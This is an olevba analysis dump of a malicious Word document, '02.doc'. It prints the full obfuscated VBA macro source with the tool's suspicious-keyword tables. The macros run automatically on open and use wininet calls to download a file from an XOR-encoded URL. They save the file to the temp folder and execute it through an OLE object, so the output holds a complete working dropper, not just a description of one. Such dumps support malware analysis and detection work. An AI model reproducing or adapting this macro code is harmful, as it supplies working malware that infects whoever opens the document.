Malicious Word macro

1. olevba 0.26 - http://decalage.info/python/oletools
2. Flags       Filename                                                        
3. ----------- -----------------------------------------------------------------
4. OLE:MASIHB- 02.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: 02.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: 02.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15.  
16. Sub HARRIS(MARCELINO As Integer)
17. WELDON
18. End Sub
19.  
20. Sub autoopen()
21. HARRIS (332)
22. End Sub
23. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
24. ANALYSIS:
25. +----------+----------+---------------------------------------+
26. | Type     | Keyword  | Description                           |
27. +----------+----------+---------------------------------------+
28. | AutoExec | AutoOpen | Runs when the Word document is opened |
29. +----------+----------+---------------------------------------+
30. -------------------------------------------------------------------------------
31. VBA MACRO MOHAMMAD.bas
32. in file: 02.doc - OLE stream: u'Macros/VBA/MOHAMMAD'
33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
34.  
35.  
36. #If VBA7 And Win64 Then
37. Public Declare PtrSafe Function SHELBY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As LongPtr) As Long
38. #End If
39.  
40. Public Function KIRBY(ByRef LAZARO As Object, ByRef HOMER As Object) As Boolean
41.  
42. Dim CHARLEY As Long
43. Set LAZARO = TRENTON(RILEY)
44.  
45. Dim ADOLFO
46.  
47. Dim ALPHONSE As String
48. ALPHONSE = MERRILL(4000, HERIBERTO, FEDERICO)
49.  
50. For CHARLEY = 26 To 47
51. CHARLEY = CHARLEY * 12
52. Next CHARLEY
53. ADOLFO = LAZARO & ALPHONSE
54.  
55. If OLLIE(289, ADOLFO) Then
56. End If
57.  
58.  
59. KIRBY = DONOVAN(LAZARO, ALPHONSE, 681)
60.  
61. End Function
62.  
63.  
64. Public Function LINWOOD(CHRISTOPER As String, JEROLD As String) As String
65.    
66.     Dim BARNEY As Integer
67.     Dim NESTOR As Integer
68.    
69.    
70.     Dim JOSIAH As Double
71.  JOSIAH = 312
72. If JOSIAH > JOSIAH * 8 Then End
73.    
74.     Dim FRITZ As Long
75.     Dim BRANT As String
76.     For FRITZ = 1 To (NICKOLAS(JEROLD) / 2)
77.         BARNEY = HOLLIS(JEROLD, FRITZ)
78.         NESTOR = QUINCY(CHRISTOPER, FRITZ)
79.         BRANT = BRANT + CARMELO(BARNEY, NESTOR)
80.     Next FRITZ
81.    LINWOOD = BRANT
82. End Function
83. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
84. ANALYSIS:
85. +------------+-------------+-------------------------+
86. | Type       | Keyword     | Description             |
87. +------------+-------------+-------------------------+
88. | Suspicious | Lib         | May run code from a DLL |
89. | IOC        | wininet.dll | Executable file name    |
90. +------------+-------------+-------------------------+
91. -------------------------------------------------------------------------------
92. VBA MACRO MILLARD.bas
93. in file: 02.doc - OLE stream: u'Macros/VBA/MILLARD'
94. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
95.  
96.  
97.  
98. Public Function RILEY() As Object
99. Dim ISMAEL As String
100. ISMAEL = LINWOOD(HERIBERTO, PORFIRIO)
101. Set RILEY = CreateObject(ISMAEL)
102. End Function
103.  
104.  
105. Public Function HOLLIS(ByRef JEROLD As String, ByRef FRITZ As Long) As Double
106.  HOLLIS = ANIBAL("&H" & (MAURICIO(78, JEROLD, STEFAN(FRITZ), 2)))
107. End Function
108.  
109.  
110. Public Function STEFAN(ByRef FRITZ As Long) As Long
111.  STEFAN = (2 * FRITZ) - 1
112. End Function
113.  
114.  
115. #If VBA7 And Win64 Then
116.        Public Function BASIL(ByRef GRADY As LongPtr, NOAH As LongPtr) As Boolean
117.     #Else
118.        Public Function BASIL(ByRef GRADY As Long, NOAH As Long) As Boolean
119.     #End If
120.         Dim JACQUES As Double
121. Dim GUADALUPE As String
122. Dim CLARK As Long
123.     GUADALUPE = MERRILL(893, HERIBERTO, ULYSSES)
124.  
125. For JACQUES = 22 To 122
126. JACQUES = JACQUES + 2.25
127. Next JACQUES
128.     GRADY = BERNARDO(NOAH, GUADALUPE, vbNullString, 0, MAXWELL, 0)
129.     BASIL = True
130. End Function
131.  
132.  
133. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
134. ANALYSIS:
135. +------------+--------------+--------------------------+
136. | Type       | Keyword      | Description              |
137. +------------+--------------+--------------------------+
138. | Suspicious | CreateObject | May create an OLE object |
139. +------------+--------------+--------------------------+
140. -------------------------------------------------------------------------------
141. VBA MACRO MARIANO.bas
142. in file: 02.doc - OLE stream: u'Macros/VBA/MARIANO'
143. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
144.  
145.  
146.  
147. Public Function NICKOLAS(CLEMENT As String) As Long
148. NICKOLAS = Len(CLEMENT)
149. End Function
150.  
151. Public Function ANIBAL(FRANCES As String) As Double
152. Dim DILLON As Double
153. For DILLON = 26 To 29
154. DILLON = DILLON * 6.127
155. Next DILLON
156. DILLON = Val(FRANCES)
157. ANIBAL = DILLON
158. End Function
159.  
160. Public Function TRENTON(ByRef NICHOLAS As Object) As Object
161. Set TRENTON = NICHOLAS.GetSpecialFolder(2)
162. End Function
163.  
164.  
165.  
166. Public Function OLLIE(WYATT As Long, ByVal ELVIS As String) As Boolean
167.     #If VBA7 And Win64 Then
168.         Dim LANNY As LongPtr, EZRA As LongPtr
169.     #Else
170.         Dim LANNY As Long, EZRA As Long
171.     #End If
172.     Dim SYDNEY As Long
173.     Dim RUBIN As String * DONNELL, ALPHONSO As String
174.     Dim REED As Integer, ELMO As Double
175.     LANNY = HIRAM
176.     If LANNY = 0 Then
177.         Exit Function
178.     End If
179.     Dim KAREEM As Boolean
180.    
181.     If BASIL(EZRA, LANNY) Then
182.     End If
183.     If EZRA = 0 Then
184.         ELMO = 0
185.     Else
186.         JEFFERSON EZRA, RUBIN, DONNELL, SYDNEY
187.         ALPHONSO = RUBIN
188.           Dim GAIL As Long
189.           GAIL = 10
190.           GAIL = GAIL + 11
191. If GAIL > GAIL + 112 Then End
192.         Do While SYDNEY <> 0
193.             JEFFERSON EZRA, RUBIN, DONNELL, SYDNEY
194.                     ALPHONSO = ALPHONSO + Mid(RUBIN, 1, SYDNEY)
195.         Loop
196.              ELMO = NICKOLAS(ALPHONSO): _
197.              REED = MAYNARD("JOSEF")
198.         Open ELVIS _
199.             For Binary _
200.         Lock Write As #REED
201.         Put #REED, , ALPHONSO
202.         GAIL = GAIL + 127
203.     If GAIL < 0 Then End
204.         Close #REED
205.     End If
206.     SHELBY EZRA
207.     SHELBY LANNY
208.     ALPHONSO = ""
209.     If ELMO Then
210.         OLLIE = True
211.     End If
212. End Function
213.  
214. Public Function DONOVAN(ByRef LAZARO As Object, ByRef ALPHONSE As String, RANDELL As Double) As Boolean
215.  
216. Set LENNY = CreateObject(LINWOOD _
217. (HERIBERTO, SEBASTIAN))
218. Dim DUSTY As Integer
219. DUSTY = LENNY.Open(LAZARO & ALPHONSE)
220. End Function
221.  
222. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
223. ANALYSIS:
224. +------------+--------------+-----------------------------------------+
225. | Type       | Keyword      | Description                             |
226. +------------+--------------+-----------------------------------------+
227. | Suspicious | Open         | May open a file                         |
228. | Suspicious | CreateObject | May create an OLE object                |
229. | Suspicious | Binary       | May read or write a binary file (if     |
230. |            |              | combined with Open)                     |
231. | Suspicious | Write        | May write to a file (if combined with   |
232. |            |              | Open)                                   |
233. | Suspicious | Put          | May write to a file (if combined with   |
234. |            |              | Open)                                   |
235. +------------+--------------+-----------------------------------------+
236. -------------------------------------------------------------------------------
237. VBA MACRO MARY.bas
238. in file: 02.doc - OLE stream: u'Macros/VBA/MARY'
239. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
240.  
241. Option Explicit
242.  
243. #If VBA7 And Win64 Then
244. Public Declare PtrSafe Function JEFFERSON Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As LongPtr, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
245. #End If
246. Public Const SEBASTIAN = "163A2B2E236C0339355D3F26333A2B202C"
247. Public Const FEDERICO = "1925272E2A3B7367204933"
248. Public Const ULYSSES = "2D263A32756D6D232E467B36316021202F6D78740079716460273727"
249. Public Const PORFIRIO = "16313C2B3F362B27221F102C3E2B113631362C287E342F372D36"
250. Public Const HERIBERTO = "VERNBOBBIE1"
251.  
252.  
253. Public Function MAYNARD(CLEMENT As String) As Integer
254.     MAYNARD = FreeFile
255. End Function
256.  
257. Public Function QUINCY(ByRef CHRISTOPER As String, ByRef FRITZ As Long) As Integer
258. QUINCY = Asc(MAURICIO(48, CHRISTOPER, ((FRITZ Mod NICKOLAS(CHRISTOPER)) + 1), 1))
259. End Function
260.  
261.  
262. Public Function MERRILL(AUGUSTUS As Long, HILARIO As String, ENRIQUE As String) As String
263. AUGUSTUS = AUGUSTUS * 3
264. MERRILL = LINWOOD(HILARIO, ENRIQUE)
265.    
266. End Function
267.  
268.  
269. Public Sub WELDON()
270.         Dim DEWITT As Double
271.  
272.     Dim ISIDRO As Double
273. For ISIDRO = 53 To 55
274. ISIDRO = ISIDRO + 11
275. Next ISIDRO
276.  
277. JARVIS (1.109)
278.  
279. End Sub
280.  
281. Public Function TRUMAN(REINALDO As Double)
282.  
283. Dim MERRILL As Object
284.  
285.  
286.     Dim JOHNATHON As Long
287. For JOHNATHON = 11 To 86
288. JOHNATHON = JOHNATHON + 55
289. Next JOHNATHON
290.    
291.  
292. Dim WESTON  As Object
293.  
294.  
295. For JOHNATHON = 22 To 33
296. JOHNATHON = JOHNATHON + 64
297. Next JOHNATHON
298.    
299.  
300. Set WESTON = RILEY
301. JOHNATHON = JOHNATHON + 66
302. Dim LEWIS As Boolean
303.  
304. If JOHNATHON > JOHNATHON * 6 Then End
305. LEWIS = KIRBY(MERRILL, WESTON)
306. REINALDO = REINALDO + 47
307. End Function
308.  
309.  
310. Public Function FREDERIC(MERLIN As String)
311. Dim BRENTON As String
312. BRENTON = "YONG"
313. TRUMAN 397 + 1.08
314. BRENTON = BRENTON + "FAUSTINO"
315. End Function
316.  
317.  
318.  
319.  
320.  
321.  
322.  
323. Sub JARVIS(ROSARIO As Double)
324.  
325. FREDERIC ("GAVIN")
326. End Sub
327.  
328. Public Function CARMELO(ByRef BARNEY As Integer, ByRef NESTOR As Integer) As String
329.     Dim CONNIE As Long
330.     CONNIE = BARNEY Xor NESTOR
331.     CARMELO = Chr$(CONNIE)
332. End Function
333.  
334.  
335.  
336.  
337.  
338. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
339. ANALYSIS:
340. +------------+----------------+-----------------------------------------+
341. | Type       | Keyword        | Description                             |
342. +------------+----------------+-----------------------------------------+
343. | Suspicious | Chr            | May attempt to obfuscate specific       |
344. |            |                | strings                                 |
345. | Suspicious | Xor            | May attempt to obfuscate specific       |
346. |            |                | strings                                 |
347. | Suspicious | Lib            | May run code from a DLL                 |
348. | Suspicious | Hex Strings    | Hex-encoded strings were detected, may  |
349. |            |                | be used to obfuscate strings (option    |
350. |            |                | --decode to see all)                    |
351. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
352. |            |                | may be used to obfuscate strings        |
353. |            |                | (option --decode to see all)            |
354. | IOC        | wininet.dll    | Executable file name                    |
355. +------------+----------------+-----------------------------------------+
356. -------------------------------------------------------------------------------
357. VBA MACRO MONROE.bas
358. in file: 02.doc - OLE stream: u'Macros/VBA/MONROE'
359. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
360.  
361.  
362.  
363.  
364.  
365. Public Const JASPER = "RUSSEL"
366. #If VBA7 And Win64 Then
367. Public Declare PtrSafe Function BERNARDO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As LongPtr, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As LongPtr
368.  
369. #Else
370. Public Declare Function SHELBY Lib "wininet.dll" Alias "InternetCloseHandle" (ByRef ERROL As Long) As Long
371. Public Declare Function BOBBIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALPHONSO As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As Long
372. Public Declare Function JEFFERSON Lib "wininet.dll" Alias "InternetReadFile" (ByVal WILFORD As Long, ByVal RUBIN As String, ByVal SHELTON As Long, CARSON As Long) As Integer
373. Public Declare Function BERNARDO Lib "wininet.dll" Alias "InternetOpenUrlA" (ByVal MOHAMMED As Long, ByVal SANDY As String, ByVal TRISTAN As String, ByVal BRIAN As Long, ByVal HOUSTON As Long, ByVal LINCOLN As Long) As Long
374. #End If
375.  
376. Public Const DONNELL = 4000
377. Public Const DENNY As String = "EMERY"
378. Public Const ALDEN = 1
379. Public Const MAXWELL = &H4000000
380.  
381. #If VBA7 And Win64 Then
382. Public Declare PtrSafe Function BOBBIE Lib "wininet.dll" Alias "InternetOpenA" (ByVal ALPHONSO As String, ByVal MONROE As Long, ByVal DOMINIQUE As String, ByVal TRISTANO As String, ByVal BOOKER As Long) As LongPtr
383. #End If
384.  
385.  
386. Public Function MAURICIO(SAMMY As Long, ByRef CLEMENT As String, ByRef BARNEY As Integer, ByRef NESTOR As Integer) As String
387.     MAURICIO = Mid$(CLEMENT, BARNEY, NESTOR)
388.     SAMMY = SAMMY + 23
389. End Function
390. #If VBA7 _
391.     And Win64 Then
392. Public Function HIRAM() As LongPtr
393.  #Else
394. Public Function HIRAM() As Long
395.  
396.  #End If
397.  
398.  HIRAM = BOBBIE(DENNY, ALDEN, vbNullString, vbNullString, 0)
399. End Function
400.  
401.  
402.  
403.  
404. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
405. ANALYSIS:
406. +------------+----------------+-----------------------------------------+
407. | Type       | Keyword        | Description                             |
408. +------------+----------------+-----------------------------------------+
409. | Suspicious | Lib            | May run code from a DLL                 |
410. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
411. |            |                | may be used to obfuscate strings        |
412. |            |                | (option --decode to see all)            |
413. | IOC        | wininet.dll    | Executable file name                    |
414. +------------+----------------+-----------------------------------------+